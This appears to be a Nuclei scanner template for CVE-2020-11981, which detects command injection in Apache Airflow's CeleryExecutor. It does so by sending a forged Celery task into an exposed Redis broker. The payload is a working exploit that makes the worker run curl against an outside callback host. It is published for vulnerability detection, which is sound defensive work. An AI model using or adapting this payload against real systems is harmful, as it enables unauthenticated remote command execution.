id: CVE-2020-11981

info:
  name: Apache Airflow <=1.10.10 - Command Injection
  author: pussycat0x
  severity: critical
  description: |
    An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
  remediation: Upgrade apache-airflow to version 1.10.11 or higher.
  reference:
    - https://github.com/apache/airflow/pull/9178
    - https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981
    - https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-11981
    cwe-id: CWE-78
    epss-score: 0.9386
    epss-percentile: 0.98955
    cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: apache
    product: airflow
    shodan-query: product:"redis"
  tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive
variables:
  data: "*3\r

    $5\r

    LPUSH\r

    $7\r

    default\r

    $936\r

    {\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \""
  encode1: '[[["curl", "http://'
  encode2: '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]'
  end: '"}'
tcp:
  - inputs:
      - data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r

          ')}}"
        read: 1024
    host:
      - "{{Hostname}}"
      - "{{Host}}:6379"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
# digest: 4a0a0047304502210083625b56b2998978613b236cb30d019f076ac29c6751ab6982923ac3926edaf402204633b7051d25f2cfcdfce4df5bba96a444c3a233e92cb5d36bb410cfb33329da:922c64590222798bb761d5b6d8e72950